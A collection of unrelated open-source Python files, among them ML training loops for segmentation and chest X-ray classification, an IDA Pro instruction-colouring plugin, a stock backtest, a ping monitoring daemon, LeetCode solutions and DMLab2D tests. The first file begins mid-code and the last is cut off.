self.criterion = SegmentationLosses(weight=weight, ignore_index=255, cuda=args.cuda).build_loss(mode=args.loss_type)
self.evaluator = Evaluator(train_set.num_classes)
self.best_pred = 0.0
def training(self, epoch):
train_loss = 0.0
self.model.train()
num_img_tr = len(self.train_dataloader)
tbar = tqdm(self.train_dataloader, desc='\r')
visualization_index = int(random.random() * len(self.train_dataloader))
vis_img, vis_tgt, vis_out = None, None, None
self.train_writer.add_scalar('learning_rate', get_learning_rate(self.optimizer), epoch)
for i, sample in enumerate(tbar):
image, target = sample['image'], sample['label']
image, target = image.cuda(), target.cuda()
self.optimizer.zero_grad()
output = self.model(image)
loss = self.criterion(output, target)
loss.backward()
self.optimizer.step()
train_loss += loss.item()
tbar.set_description('Train loss: %.3f' % (train_loss / (i + 1)))
self.train_writer.add_scalar('total_loss_iter', loss.item(), i + num_img_tr * epoch)
if i == visualization_index:
vis_img, vis_tgt, vis_out = image, target, output
self.train_writer.add_scalar('total_loss_epoch', train_loss / self.dataset_size['train'], epoch)
if constants.VISUALIZATION:
self.train_summary.visualize_state(self.train_writer, self.args.dataset, vis_img, vis_tgt, vis_out, epoch)
print('[Epoch: %d, numImages: %5d]' % (epoch, i * self.args.batch_size + image.data.shape[0]))
print('Loss: %.3f' % train_loss)
print('BestPred: %.3f' % self.best_pred)
def validation(self, epoch, test=False):
self.model.eval()
self.evaluator.reset()
ret_list = []
if test:
tbar = tqdm(self.test_dataloader, desc='\r')
else:
tbar = tqdm(self.val_dataloader, desc='\r')
test_loss = 0.0
visualization_index = int(random.random() * len(self.val_dataloader))
vis_img, vis_tgt, vis_out = None, None, None
for i, sample in enumerate(tbar):
image, target = sample['image'], sample['label']
image, target = image.cuda(), target.cuda()
with torch.no_grad():
output = self.model(image)
if i == visualization_index:
vis_img, vis_tgt, vis_out = image, target, output
loss = self.criterion(output, target)
test_loss += loss.item()
tbar.set_description('Test loss: %.3f' % (test_loss / (i + 1)))
pred = torch.argmax(output, dim=1).data.cpu().numpy()
target = target.cpu().numpy()
self.evaluator.add_batch(target, pred)
Acc = self.evaluator.Pixel_Accuracy()
Acc_class = self.evaluator.Pixel_Accuracy_Class()
mIoU = self.evaluator.Mean_Intersection_over_Union()
mIoU_20 = self.evaluator.Mean_Intersection_over_Union_20()
FWIoU = self.evaluator.Frequency_Weighted_Intersection_over_Union()
if not test:
self.val_writer.add_scalar('total_loss_epoch', test_loss / self.dataset_size['val'], epoch)
self.val_writer.add_scalar('mIoU', mIoU, epoch)
self.val_writer.add_scalar('mIoU_20', mIoU_20, epoch)
self.val_writer.add_scalar('Acc', Acc, epoch)
self.val_writer.add_scalar('Acc_class', Acc_class, epoch)
self.val_writer.add_scalar('fwIoU', FWIoU, epoch)
if constants.VISUALIZATION:
self.val_summary.visualize_state(self.val_writer, self.args.dataset, vis_img, vis_tgt, vis_out, epoch)
print("Test: " if test else "Validation:")
print('[Epoch: %d, numImages: %5d]' % (epoch, i * self.args.batch_size + image.data.shape[0]))
print("Acc:{}, Acc_class:{}, mIoU:{}, mIoU_20:{}, fwIoU: {}".format(Acc, Acc_class, mIoU, mIoU_20, FWIoU))
print('Loss: %.3f' % test_loss)
if not test:
new_pred = mIoU
if new_pred > self.best_pred:
self.best_pred = new_pred
self.saver.save_checkpoint({
'epoch': epoch + 1,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
'best_pred': self.best_pred,
})
return test_loss, mIoU, mIoU_20, Acc, Acc_class, FWIoU#, ret_list
def load_best_checkpoint(self):
checkpoint = self.saver.load_checkpoint()
self.model.load_state_dict(checkpoint['state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer'])
print(f'=> loaded checkpoint - epoch {checkpoint["epoch"]})')
return checkpoint["epoch"]
|
src/masonite/authentication/guards/__init__.py | cercos/masonite | 1,816 | 12798748
from .WebGuard import WebGuard
|
Reversing/FullColor.py | LeanVel/Tools | 130 | 12798749 | # encoding: utf-8
# http://www.hexblog.com/?p=120
# Default IDA Pro Paths:
# MAC /Applications/IDA\ Pro\ X/idaq.app/Contents/MacOS/plugins/
# Windows C:\Program Files (x86)\IDA X\plugins
# to make it autoexec on openfile
# add this to plugins.cfg
# ; Other plugins
#FullColor FullColor.py 0 0 SILENT
# thanks @JR0driguezB for help :)
from __future__ import print_function
from idautils import Heads
from idc import get_segm_start, get_segm_end, print_insn_mnem, get_screen_ea, print_operand, set_color, CIC_ITEM
import idaapi
#idaapi.auto_wait()
PLUGIN_TEST = 1
class FullColor_t(idaapi.plugin_t):
flags = idaapi.PLUGIN_UNL
comment = "Set colors :)"
help = "No help needed"
wanted_name = "FullColor"
wanted_hotkey = ""
def init(self):
#idaapi.msg("init() called!\n")
#self.run(0)
return idaapi.PLUGIN_OK
def run(self, arg=0):
print("hell2")
idaapi.msg("run() called with %d!\n" % arg)
heads = Heads(get_segm_start(get_screen_ea()), get_segm_end(get_screen_ea()))
funcCalls = []
xor = []
antiVM = []
for i in heads:
# Color the Calls off-white
if print_insn_mnem(i) == "call":
funcCalls.append(i)
# Color Anti-VM instructions Red and print their location
elif print_insn_mnem(i) in ("sidt", "sgdt", "sldt", "smsw", "str", "in", "cpuid"):
antiVM.append(i)
# Color non-zeroing out xor instructions Orange
elif print_insn_mnem(i) == "xor" and (print_operand(i,0) != print_operand(i,1)):
xor.append(i)
print("Number of calls: %d" % (len(funcCalls)))
for i in funcCalls:
set_color(i, CIC_ITEM, 0xc7fdff)
print("Number of potential Anti-VM instructions: %d" % (len(antiVM)))
for i in antiVM:
print("Anti-VM potential at %x" % i)
set_color(i, CIC_ITEM, 0x0000ff)
print("Number of xor: %d" % (len(xor)))
for i in xor:
set_color(i, CIC_ITEM, 0x00a5ff)
def term(self):
idaapi.msg("term() called!\n")
def PLUGIN_ENTRY():
return FullColor_t()
if PLUGIN_TEST:
# Create form
f = PLUGIN_ENTRY()
f.init()
f.run()
f.term()
|
misc/pytorch_toolkit/chest_xray_screening/chest_xray_screening/train.py | e-ddykim/training_extensions | 256 | 12798788
import numpy as np
import time
import os
import argparse
import torch
from torch.backends import cudnn
from torch import optim
import torch.nn.functional as tfunc
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import StepLR
from .utils.dataloader import RSNADataSet
from .utils.score import compute_auroc
from .utils.model import DenseNet121, DenseNet121Eff
from math import sqrt
import json
from tqdm import tqdm as tq
class RSNATrainer():
def __init__(self, model,
data_loader_train, data_loader_valid, data_loader_test,
class_count, checkpoint, device, class_names, lr):
self.gepoch_id = 0
self.device = device
self.model = model.to(self.device)
self.data_loader_train = data_loader_train
self.data_loader_valid = data_loader_valid
self.data_loader_test = data_loader_test
self.class_names = class_names
self.class_count = class_count
self.auroc_max = 0.0 # Setting maximum AUROC value as zero
self.optimizer = optim.Adam(self.model.parameters(), lr=lr)
if checkpoint is not None:
model_checkpoint = torch.load(checkpoint)
self.optimizer.load_state_dict(model_checkpoint['optimizer'])
else:
model_checkpoint = None
self.loss_fn = torch.nn.BCELoss()
def train(self, max_epoch, savepath):
train_loss_min = 1e+5 # A random very high number
valid_loss_min = 1e+5
for epoch_id in range(max_epoch):
print(f"Epoch {epoch_id+1}/{max_epoch}")
self.gepoch_id = epoch_id
train_loss, valid_loss, auroc_max = self.epoch_train()
self.current_train_loss = train_loss
self.current_valid_loss = valid_loss
timestamp_end = time.strftime("%H%M%S-%d%m%Y")
if train_loss < train_loss_min:
train_loss_min = train_loss
if valid_loss < valid_loss_min:
valid_loss_min = valid_loss
torch.save({'epoch': epoch_id + 1,
'state_dict': self.model.state_dict(),
'best_loss': valid_loss_min,
'optimizer' : self.optimizer.state_dict()},
os.path.join(savepath, f'm-epoch-{epoch_id}.pth'))
test_auroc = self.test()
print(f"Epoch:{epoch_id + 1}| EndTime:{timestamp_end}| TestAUROC: {test_auroc}| ValidAUROC: {auroc_max}")
def valid(self):
self.model.eval()
loss_valid_r = 0
valid_batches = 0 # Counter for valid batches
out_gt = torch.FloatTensor().to(self.device)
out_pred = torch.FloatTensor().to(self.device)
with torch.no_grad():
for (var_input, var_target) in tq(self.data_loader_valid):
var_target = var_target.to(self.device)
out_gt = torch.cat((out_gt, var_target), 0).to(self.device)
_, c, h, w = var_input.size()
var_input = var_input.view(-1, c, h, w)
var_output = self.model(var_input.to(self.device))
out_pred = torch.cat((out_pred, var_output), 0)
lossvalue = self.loss_fn(
var_output, tfunc.one_hot(var_target.squeeze(1).long(), num_classes=self.class_count).float())
loss_valid_r += lossvalue.item()
valid_batches += 1
valid_loss = loss_valid_r / valid_batches
auroc_individual = compute_auroc(
tfunc.one_hot(out_gt.squeeze(1).long()).float(),
out_pred, self.class_count)
print(len(auroc_individual))
auroc_mean = np.array(auroc_individual).mean()
return valid_loss, auroc_mean
def epoch_train(self):
loss_train_list = []
loss_valid_list = []
self.model.train()
scheduler = StepLR(self.optimizer, step_size=6, gamma=0.002)
for batch_id, (var_input, var_target) in tq(enumerate(self.data_loader_train)):
var_target = var_target.to(self.device)
var_input = var_input.to(self.device)
var_output= self.model(var_input)
trainloss_value = self.loss_fn(
var_output,
tfunc.one_hot(var_target.squeeze(1).long(), num_classes=self.class_count).float())
self.optimizer.zero_grad()
trainloss_value.backward()
self.optimizer.step()
train_loss_value = trainloss_value.item()
loss_train_list.append(train_loss_value)
if batch_id % (len(self.data_loader_train)-1) == 0 and batch_id != 0:
validloss_value, auroc_mean = self.valid()
loss_valid_list.append(validloss_value)
if auroc_mean > self.auroc_max:
print('Better auroc obtained')
self.auroc_max = auroc_mean
scheduler.step()
train_loss_mean = np.mean(loss_train_list)
valid_loss_mean = np.mean(loss_valid_list)
return train_loss_mean, valid_loss_mean, auroc_mean
def test(self):
cudnn.benchmark = True
out_gt = torch.FloatTensor().to(self.device)
out_pred = torch.FloatTensor().to(self.device)
self.model.eval()
with torch.no_grad():
for i, (var_input, var_target) in enumerate(self.data_loader_test):
var_target = var_target.to(self.device)
var_input = var_input.to(self.device)
out_gt = torch.cat((out_gt, var_target), 0).to(self.device)
_, c, h, w = var_input.size()
var_input = var_input.view(-1, c, h, w)
out = self.model(var_input)
out_pred = torch.cat((out_pred, out), 0)
auroc_individual = compute_auroc(tfunc.one_hot(out_gt.squeeze(1).long()).float(), out_pred, self.class_count)
auroc_mean = np.array(auroc_individual).mean()
print(f'AUROC mean:{auroc_mean}')
for i, auroc_val in enumerate(auroc_individual):
print(f"{self.class_names[i]}:{auroc_val}")
return auroc_mean
def main(args):
lr = args.lr
checkpoint = args.checkpoint
batch_size = args.bs
max_epoch = args.epochs
class_count = args.clscount #The objective is to classify the image into 3 classes
device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # use gpu if available
class_names = ['Lung Opacity', 'Normal', 'No Lung Opacity / Not Normal']
# Data Loader
dpath = args.dpath
img_pth = os.path.join(args.dpath, 'processed_data/')
numpy_path = os.path.join(args.dpath, 'data_split/')
with open(os.path.join(dpath, 'rsna_annotation.json')) as lab_file:
labels = json.load(lab_file)
# Place numpy file containing train-valid-test split on tools folder
tr_list = np.load(os.path.join(numpy_path,'train_list.npy')).tolist()
val_list = np.load(os.path.join(numpy_path,'valid_list.npy')).tolist()
test_list = np.load(os.path.join(numpy_path,'test_list.npy')).tolist()
dataset_train = RSNADataSet(tr_list, labels, img_pth, transform=True)
dataset_valid = RSNADataSet(val_list, labels, img_pth, transform=True)
data_loader_train = DataLoader(
dataset=dataset_train,
batch_size=batch_size,
shuffle=True,
num_workers=4,
pin_memory=False)
data_loader_valid = DataLoader(
dataset=dataset_valid,
batch_size=batch_size,
shuffle=False,
num_workers=4,
pin_memory=False)
dataset_test = RSNADataSet(test_list, labels, img_pth, transform=True)
data_loader_test = DataLoader(
dataset=dataset_test,
batch_size=1,
shuffle=False,
num_workers=4,
pin_memory=False)
# Construct Model
if args.optimised:
alpha = args.alpha
phi = args.phi
beta = args.beta
if beta is None:
beta = round(sqrt(2 / alpha), 3)
alpha = alpha ** phi
beta = beta ** phi
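        # Our reading of this block (EfficientNet-style compound scaling):
        # beta defaults to sqrt(2/alpha) so that alpha * beta**2 is about 2,
        # and phi then scales both factors before they are passed to
        # DenseNet121Eff below.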
model = DenseNet121Eff(alpha, beta, class_count)
else:
model = DenseNet121(class_count)
# Train the Model
savepath = args.spath
rsna_trainer = RSNATrainer(
model, data_loader_train, data_loader_valid, data_loader_test,
class_count,checkpoint, device, class_names, lr)
rsna_trainer.train(max_epoch, savepath)
print("Model trained !")
if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--lr",
required=False,
help="Learning rate",
default=1e-4,
type = float)
parser.add_argument("--checkpoint",
required=False,
help="Checkpoint model weight",
default= None,
type = str)
parser.add_argument("--bs",
required=False,
default=16,
help="Batchsize",
type=int)
parser.add_argument("--dpath",
required=True,
help="Path to folder containing all data",
type =str)
parser.add_argument("--epochs",
required=False,
default=15,
help="Number of epochs",
type=int)
parser.add_argument("--clscount",
required=False,
default=3,
help="Number of classes",
type=int)
parser.add_argument("--spath",
required=True,
help="Path to folder in which models should be saved",
type =str)
parser.add_argument("--optimised",
required=False, default=False,
help="enable flag->eff model",
action='store_true')
parser.add_argument("--alpha",
required=False,
help="alpha for the model",
default=(11 / 6),
type=float)
parser.add_argument("--phi",
required=False,
help="Phi for the model.",
default=1.0,
type=float)
parser.add_argument("--beta",
required=False,
help="Beta for the model.",
default=None,
type=float)
custom_args = parser.parse_args()
main(custom_args)
|
Portfolio_Strategies/vectorized_backtesting.py | vhn0912/Finance | 441 | 12798800 | import numpy as np
import pandas as pd
import yfinance as yf
import matplotlib.pyplot as plt
import datetime
from yahoo_fin import stock_info as si
plt.rcParams['figure.figsize'] = (15, 10)
tickers = si.tickers_dow()
individual_stock = input(f"Which of the following stocks would you like to backtest \n{tickers}\n:")
num_of_years = 1
start = datetime.date.today() - datetime.timedelta(days = int(365.25*num_of_years))
yf_prices = yf.download(tickers, start=start)
# Individual Stock Strategy
prices = yf_prices['Adj Close'][individual_stock]
rs = prices.apply(np.log).diff(1).fillna(0)
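# Moving-average crossover signal: the 5-day mean minus the 22-day mean; its sign
# gives the position (+1 long when the short MA is above the long MA, -1 short otherwise).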
w1 = 5
w2 = 22
ma_x = prices.rolling(w1).mean() - prices.rolling(w2).mean()
pos = ma_x.apply(np.sign)
fig, ax = plt.subplots(2,1)
ma_x.plot(ax=ax[0], title=f'{individual_stock} Moving Average Crossovers and Positions')
pos.plot(ax=ax[1])
plt.show()
my_rs = pos.shift(1)*rs
plt.subplots()
my_rs.cumsum().apply(np.exp).plot(title=f'{individual_stock} MA Strategy Performance')
rs.cumsum().apply(np.exp).plot()
plt.legend([f'{individual_stock} MA Performance', f'{individual_stock} Buy and Hold Performance'])
plt.show()
print (f'Performance Statistics for {individual_stock} ({num_of_years} years):')
print ('Moving Average Return: ' + str(100 * round(my_rs.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
print('Buy and Hold Return: ' + str(100 * round(rs.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
# Full Portfolio Strategy
prices = yf_prices['Adj Close']
rs = prices.apply(np.log).diff(1).fillna(0)
w1 = 5
w2 = 22
ma_x = prices.rolling(w1).mean() - prices.rolling(w2).mean()
pos = ma_x.apply(np.sign)
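# Normalise the +/-1 signals so the absolute weights sum to 1 each day,
# spreading capital equally across the constituents.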
pos /= pos.abs().sum(1).values.reshape(-1,1)
fig, ax = plt.subplots(2,1)
ma_x.plot(ax=ax[0], title='Individual Moving Average Crossovers and Positions')
ax[0].legend(bbox_to_anchor=(1.1, 1.05))
pos.plot(ax=ax[1])
ax[1].legend(bbox_to_anchor=(1.1, 1.05))
plt.show()
my_rs = (pos.shift(1)*rs)
my_rs.cumsum().apply(np.exp).plot(title='Individual Stocks Strategy Performance')
plt.show()
print ('-' * 60)
print (f'Performance Statistics for {num_of_years} years:')
for ticker in tickers:
    print (f'Moving Average Return for {ticker}: ' + str(100 * round(my_rs.cumsum().apply(np.exp)[ticker].tolist()[-1], 4)) + '%')
plt.subplots()
my_rs = (pos.shift(1)*rs).sum(1)
my_rs.cumsum().apply(np.exp).plot(title='Full Portfolio Strategy Performance')
rs.mean(1).cumsum().apply(np.exp).plot()
plt.legend(['Portfolio MA Performance', 'Buy and Hold Performance'])
plt.show()
print ('-' * 60)
print (f'Performance Statistics for {tickers} ({num_of_years} years):')
print ('Moving Average Return: ' + str(100 * round(my_rs.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
print('Buy and Hold Return: ' + str(100 * round(rs.mean(1).cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
# Portfolio Tests
# Look-Ahead Bias
my_rs1 = (pos*rs).sum(1)
my_rs2 = (pos.shift(1)*rs).sum(1)
plt.subplots()
my_rs1.cumsum().apply(np.exp).plot(title='Full Portfolio Performance')
my_rs2.cumsum().apply(np.exp).plot()
plt.legend(['With Look-Ahead Bias', 'Without Look-Ahead Bias'])
plt.show()
print ('-' * 60)
print (f'Performance Statistics for {tickers} ({num_of_years} years):')
print ('With Look-Ahead Bias: ' + str(100 * round(my_rs1.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
print('Without Look-Ahead Bias: ' + str(100 * round(my_rs2.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
# Signal Lags
lags = range(1, 11)
lagged_rs = pd.Series(dtype=float, index=lags)
print ('-' * 60)
print (f'Lag Performance Statistics for {tickers} ({num_of_years} years):')
for lag in lags:
my_rs = (pos.shift(lag)*rs).sum(1)
my_rs.cumsum().apply(np.exp).plot()
lagged_rs[lag] = my_rs.sum()
print (f'Lag {lag} Return: ' + str(100 * round(my_rs.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
plt.title('Full Portfolio Strategy Performance with Lags')
plt.legend(lags, bbox_to_anchor=(1.1, 0.95))
plt.show()
# Transaction Costs
tc_pct = 0.01
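# Simple cost model: charge tc_pct per unit of daily turnover, where turnover
# is the summed absolute change in portfolio weights.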
delta_pos = pos.diff(1).abs().sum(1)
my_tcs = tc_pct*delta_pos
my_rs1 = (pos.shift(1)*rs).sum(1)
my_rs2 = (pos.shift(1)*rs).sum(1) - my_tcs
plt.subplots()
my_rs1.cumsum().apply(np.exp).plot()
my_rs2.cumsum().apply(np.exp).plot()
plt.title('Full Portfolio Performance')
plt.legend(['Without Transaction Costs', 'With Transaction Costs'])
plt.show()
print ('-' * 60)
print (f'Performance Statistics for {tickers} ({num_of_years} years):')
print ('Without Transaction Costs: ' + str(100 * round(my_rs1.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
print('With Transaction Costs: ' + str(100 * round(my_rs2.cumsum().apply(np.exp).tolist()[-1], 4)) + '%') |
integrations/pinger/pinger.py | hamptons/alerta-contrib | 114 | 12798802 | <filename>integrations/pinger/pinger.py
import sys
import platform
import time
import subprocess
import threading
import Queue
import re
import logging
import yaml
from alertaclient.api import Client
__version__ = '3.3.0'
LOG = logging.getLogger('alerta.pinger')
LOG.setLevel(logging.DEBUG)
LOG.addHandler(logging.StreamHandler())
PING_FILE = 'alert-pinger.targets'
PING_MAX_TIMEOUT = 15 # seconds
PING_MAX_RETRIES = 2
PING_SLOW_WARNING = 200 # ms
PING_SLOW_CRITICAL = 500 # ms
SERVER_THREAD_COUNT = 20
LOOP_EVERY = 30
_PING_ALERTS = [
'PingFailed',
'PingSlow',
'PingOK',
'PingError',
]
PING_OK = 0 # all ping replies received within timeout
PING_FAILED = 1 # some or all ping replies not received or did not respond within timeout
PING_ERROR = 2 # unspecified error with ping
# Initialise Rules
def init_targets():
targets = list()
LOG.info('Loading Ping targets...')
try:
targets = yaml.load(open(PING_FILE))
except Exception as e:
LOG.error('Failed to load Ping targets: %s', e)
LOG.info('Loaded %d Ping targets OK', len(targets))
return targets
class WorkerThread(threading.Thread):
def __init__(self, api, queue):
threading.Thread.__init__(self)
LOG.debug('Initialising %s...', self.getName())
self.last_event = {}
self.queue = queue # internal queue
self.api = api # message broker
def run(self):
while True:
LOG.debug('Waiting on input queue...')
item = self.queue.get()
if not item:
LOG.info('%s is shutting down.', self.getName())
break
environment, service, resource, retries, queue_time = item
if time.time() - queue_time > LOOP_EVERY:
LOG.warning('Ping request to %s expired after %d seconds.', resource, int(time.time() - queue_time))
self.queue.task_done()
continue
LOG.info('%s pinging %s...', self.getName(), resource)
if retries > 1:
rc, rtt, loss, stdout = self.pinger(resource, count=2, timeout=5)
else:
rc, rtt, loss, stdout = self.pinger(resource, count=5, timeout=PING_MAX_TIMEOUT)
if rc != PING_OK and retries:
LOG.info('Retrying ping %s %s more times', resource, retries)
self.queue.put((environment, service, resource, retries - 1, time.time()))
self.queue.task_done()
continue
if rc == PING_OK:
avg, max = rtt
if avg > PING_SLOW_CRITICAL:
event = 'PingSlow'
severity = 'critical'
text = 'Node responded to ping in %s ms avg (> %s ms)' % (avg, PING_SLOW_CRITICAL)
elif avg > PING_SLOW_WARNING:
event = 'PingSlow'
severity = 'warning'
text = 'Node responded to ping in %s ms avg (> %s ms)' % (avg, PING_SLOW_WARNING)
else:
event = 'PingOK'
severity = 'normal'
text = 'Node responding to ping avg/max %s/%s ms.' % tuple(rtt)
value = '%s/%s ms' % tuple(rtt)
elif rc == PING_FAILED:
event = 'PingFailed'
severity = 'major'
text = 'Node did not respond to ping or timed out within %s seconds' % PING_MAX_TIMEOUT
value = '%s%% packet loss' % loss
elif rc == PING_ERROR:
event = 'PingError'
severity = 'warning'
text = 'Could not ping node %s.' % resource
value = stdout
else:
LOG.warning('Unknown ping return code: %s', rc)
continue
# Defaults
resource += ':icmp'
group = 'Ping'
correlate = _PING_ALERTS
raw_data = stdout
try:
self.api.send_alert(
resource=resource,
event=event,
correlate=correlate,
group=group,
value=value,
severity=severity,
environment=environment,
service=service,
text=text,
event_type='serviceAlert',
raw_data=raw_data,
)
except Exception as e:
LOG.warning('Failed to send alert: %s', e)
self.queue.task_done()
LOG.info('%s ping %s complete.', self.getName(), resource)
self.queue.task_done()
@staticmethod
def pinger(node, count=1, interval=1, timeout=5):
if timeout <= count * interval:
timeout = count * interval + 1
if timeout > PING_MAX_TIMEOUT:
timeout = PING_MAX_TIMEOUT
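        # macOS ping takes the overall timeout via -t, while Linux ping uses -w
        # (deadline in seconds), hence the platform switch below.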
if sys.platform == "darwin":
cmd = "ping -q -c %s -i %s -t %s %s" % (count, interval, timeout, node)
else:
cmd = "ping -q -c %s -i %s -w %s %s" % (count, interval, timeout, node)
ping = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout = ping.communicate()[0].rstrip('\n')
rc = ping.returncode
LOG.debug('Ping %s => %s (rc=%d)', cmd, stdout, rc)
m = re.search('(?P<loss>\d+(\.\d+)?)% packet loss', stdout)
if m:
loss = m.group('loss')
else:
loss = 'n/a'
m = re.search('(?P<min>\d+\.\d+)/(?P<avg>\d+\.\d+)/(?P<max>\d+\.\d+)/(?P<mdev>\d+\.\d+)\s+ms', stdout)
if m:
rtt = (float(m.group('avg')), float(m.group('max')))
else:
rtt = (0, 0)
if rc == 0:
LOG.info('%s: is alive %s', node, rtt)
else:
LOG.info('%s: not responding', node)
return rc, rtt, loss, stdout
class PingerDaemon(object):
def __init__(self):
self.shuttingdown = False
def run(self):
self.running = True
# Create internal queue
self.queue = Queue.Queue()
self.api = Client()
# Initialiase ping targets
ping_list = init_targets()
# Start worker threads
LOG.debug('Starting %s worker threads...', SERVER_THREAD_COUNT)
for i in range(SERVER_THREAD_COUNT):
w = WorkerThread(self.api, self.queue)
try:
w.start()
except Exception as e:
LOG.error('Worker thread #%s did not start: %s', i, e)
continue
LOG.info('Started worker thread: %s', w.getName())
while not self.shuttingdown:
try:
for p in ping_list:
if 'targets' in p and p['targets']:
for target in p['targets']:
environment = p['environment']
service = p['service']
retries = p.get('retries', PING_MAX_RETRIES)
self.queue.put((environment, service, target, retries, time.time()))
LOG.debug('Send heartbeat...')
try:
origin = '{}/{}'.format('pinger', platform.uname()[1])
self.api.heartbeat(origin, tags=[__version__])
except Exception as e:
LOG.warning('Failed to send heartbeat: %s', e)
time.sleep(LOOP_EVERY)
LOG.info('Ping queue length is %d', self.queue.qsize())
except (KeyboardInterrupt, SystemExit):
self.shuttingdown = True
LOG.info('Shutdown request received...')
self.running = False
for i in range(SERVER_THREAD_COUNT):
self.queue.put(None)
w.join()
def main():
pinger = PingerDaemon()
pinger.run()
if __name__ == '__main__':
main()
|
Python3/872.py | rakhi2001/ecom7 | 854 | 12798834 | <filename>Python3/872.py
__________________________________________________________________________________________________
sample 24 ms submission
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
from collections import deque
class Solution:
def leafSimilar(self, root1: TreeNode, root2: TreeNode) -> bool:
def get_leafs(root):
if not root:
return []
if not root.left and not root.right:
return [root.val]
return get_leafs(root.left) + get_leafs(root.right)
return get_leafs(root1) == get_leafs(root2)
__________________________________________________________________________________________________
sample 12908 kb submission
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def leafSimilar(self, root1: TreeNode, root2: TreeNode) -> bool:
return self.getleaf(root1) == self.getleaf(root2)
def getleaf(self, root):
if not root: return []
stack = [root]
out = []
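        # Iterative DFS: walk down the left spine first, then pop nodes and collect
        # leaves, pushing right children (and their left spines) as they appear.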
while root.left:
stack.append(root.left)
root = root.left
while stack:
p = stack.pop()
if not p.left and not p.right:
out.append(p.val)
if p.right:
stack.append(p.right)
p = p.right
while p.left:
stack.append(p.left)
p = p.left
return out
__________________________________________________________________________________________________
|
test/simple_log/quick_start.py | lesteve/tensorwatch | 3,453 | 12798872 | <reponame>lesteve/tensorwatch<gh_stars>1000+
import tensorwatch as tw
import time
w = tw.Watcher(filename='test.log')
s = w.create_stream(name='my_metric')
#w.make_notebook()
for i in range(1000):
s.write((i, i*i))
time.sleep(1)
|
dmlab2d/dmlab2d_test.py | Robert-Held/lab2d | 377 | 12798894 | # Copyright 2019 The DMLab2D Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for dmlab2d.dmlab2d."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
from dm_env import test_utils
import numpy as np
import dmlab2d
from dmlab2d import runfiles_helper
class Dmlab2dDmEnvTest(test_utils.EnvironmentTestMixin, absltest.TestCase):
def make_object_under_test(self):
lab2d = dmlab2d.Lab2d(runfiles_helper.find(),
{'levelName': 'examples/level_api'})
return dmlab2d.Environment(lab2d, lab2d.observation_names(), 0)
class Dmlab2DTest(absltest.TestCase):
def _create_env(self, extra_settings=None):
settings = extra_settings.copy() if extra_settings else {}
settings['levelName'] = 'examples/level_api'
return dmlab2d.Lab2d(runfiles_helper.find(), settings)
def test_lab2d_environment_name(self):
self.assertEqual(self._create_env().name(), 'dmlab2d')
def test_lab2d_observation_names(self):
env = self._create_env()
self.assertEqual(env.observation_names(),
['VIEW' + str(i) for i in range(1, 6)])
def test_lab2d_observation_spec(self):
env = self._create_env()
self.assertEqual(
env.observation_spec('VIEW1'), {
'dtype': np.dtype('uint8'),
'shape': (1,)
})
self.assertEqual(
env.observation_spec('VIEW2'), {
'dtype': np.dtype('double'),
'shape': (2,)
})
self.assertEqual(
env.observation_spec('VIEW3'), {
'dtype': np.dtype('int32'),
'shape': (3,)
})
self.assertEqual(
env.observation_spec('VIEW4'), {
'dtype': np.dtype('int64'),
'shape': (4,)
})
# Text is stored in objects.
self.assertEqual(
env.observation_spec('VIEW5'), {
'dtype': np.dtype('O'),
'shape': ()
})
def test_lab2d_action_spec(self):
env = self._create_env()
self.assertEqual(env.action_discrete_names(), ['REWARD_ACT'])
self.assertEqual(
env.action_discrete_spec('REWARD_ACT'), {
'min': 0,
'max': 4
})
self.assertEqual(env.action_continuous_names(), ['OBSERVATION_ACT'])
self.assertEqual(
env.action_continuous_spec('OBSERVATION_ACT'), {
'min': -5,
'max': 5
})
self.assertEqual(env.action_text_names(), ['LOG_EVENT'])
def test_lab2d_start_environment(self):
env = self._create_env()
env.start(episode=0, seed=0)
def test_lab2d_events_start(self):
env = self._create_env()
env.start(episode=0, seed=0)
events = env.events()
self.assertLen(events, 1)
event_name, observations = events[0]
self.assertEqual(event_name, 'start')
self.assertLen(observations, 1)
np.testing.assert_array_equal(observations[0], [1, 2, 3])
def test_lab2d_events_cleared_after_advance_not_read(self):
env = self._create_env()
env.start(episode=0, seed=0)
self.assertLen(env.events(), 1)
self.assertLen(env.events(), 1)
env.advance()
self.assertEmpty(env.events())
def test_lab2d_observe(self):
env = self._create_env()
env.start(episode=0, seed=0)
np.testing.assert_array_equal(env.observation('VIEW1'), [1])
np.testing.assert_array_equal(env.observation('VIEW2'), [1, 2])
np.testing.assert_array_equal(env.observation('VIEW3'), [1, 2, 3])
np.testing.assert_array_equal(env.observation('VIEW4'), [1, 2, 3, 4])
self.assertEqual(env.observation('VIEW5'), b'')
def test_lab2d_ten_steps_terminate_environment(self):
env = self._create_env()
env.start(episode=0, seed=0)
for _ in range(9):
self.assertEqual(env.advance()[0], dmlab2d.RUNNING)
self.assertEqual(env.advance()[0], dmlab2d.TERMINATED)
def test_lab2d_settings_environment(self):
env = self._create_env({'steps': '5'})
env.start(episode=0, seed=0)
for _ in range(4):
self.assertEqual(env.advance()[0], dmlab2d.RUNNING)
self.assertEqual(env.advance()[0], dmlab2d.TERMINATED)
def test_lab2d_properties_environment(self):
